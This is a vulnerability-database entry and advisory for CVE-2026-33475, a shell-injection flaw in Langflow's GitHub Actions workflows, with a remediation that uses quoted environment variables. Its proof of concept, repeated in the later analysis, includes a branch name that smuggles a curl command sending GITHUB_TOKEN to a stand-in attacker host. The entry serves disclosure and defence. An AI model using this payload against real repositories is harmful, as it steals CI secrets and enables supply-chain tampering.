CVE-2026-33475
Published: 24 March 2026
Summary
CVE-2026-33475 is a critical-severity Injection (CWE-74) vulnerability in Langflow Langflow. Its CVSS base score is 9.1 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Poisoned Pipeline Execution (T1677); ranked at the 19.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Machine Learning Libraries; in the Privacy and Disclosure risk domain.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-10 (Information Input Validation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly requires validation and sanitization of untrusted user-controlled inputs like GitHub branch names and PR titles before interpolation into shell commands, preventing command injection.
Ensures GitHub Actions workflows are configured with secure settings such as environment variables and proper quoting to block unsanitized interpolation of context variables.
Mandates timely identification and correction of flaws in CI/CD workflows, as implemented in Langflow version 1.9.0 to refactor vulnerable run steps.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unsanitized GitHub context interpolation in workflow run: steps directly enables Poisoned Pipeline Execution (T1677) via malicious branch/PR inputs; this facilitates Supply Chain Compromise (T1195.002) by granting CI privileges for release tampering and artifact poisoning; the core mechanism is arbitrary Unix shell command injection (T1059.004).
NVD Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{…
more
github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
Deeper analysisAI
CVE-2026-33475 is an unauthenticated remote shell injection vulnerability in multiple GitHub Actions workflows within the Langflow repository, a tool for building and deploying AI-powered agents and workflows. The issue affects versions prior to 1.9.0 and stems from unsanitized interpolation of GitHub context variables, such as `${{ github.head_ref }}` or `${{ github.event.pull_request.head.ref }}`, directly into `run:` steps. This allows arbitrary shell command injection through user-controlled inputs like branch names, pull request titles, or custom inputs. Affected files include `.github/actions/install-playwright/action.yml`, `.github/workflows/deploy-docs-draft.yml`, `.github/workflows/docker-build.yml`, `.github/workflows/release_nightly.yml`, `.github/workflows/python_test.yml`, and `.github/workflows/typescript_test.yml`.
Any unauthenticated attacker can exploit this by forking a public Langflow repository with GitHub Actions enabled, creating a branch with a malicious name containing shell commands (e.g., `injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN`), and opening a pull request to the main branch. When the workflow triggers, such as `deploy-docs-draft.yml`, the injected commands execute with CI privileges, enabling full access to secrets like `GITHUB_TOKEN`, exfiltration of sensitive data, pushing malicious tags or images, tampering with releases, or broader supply chain compromise. The vulnerability has a CVSS score of 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) and maps to CWE-74 and CWE-78.
Langflow version 1.9.0 patches the vulnerability. The GitHub security advisory (GHSA-87cc-65ph-2j4w) recommends refactoring workflows to avoid direct interpolation of user-controlled GitHub context variables in `run:` steps, instead using environment variables wrapped in double quotes, such as `env: BRANCH_NAME: ${{ github.head_ref }}` followed by `run: echo "Branch is: \"$BRANCH_NAME\""` . This ensures proper sanitization and prevents command injection.
Langflow's focus on AI-powered agents and workflows gives this CI/CD vulnerability particular relevance to AI/ML supply chains, as compromises could propagate tainted artifacts into production AI deployments.
Details
- CWE(s)
Affected Products
AI Security AnalysisAI
- AI Category
- Machine Learning Libraries
- Risk Domain
- Privacy and Disclosure
- OWASP Top 10 for LLMs 2025
- None mapped
- Classification Reason
- Matched keywords: ai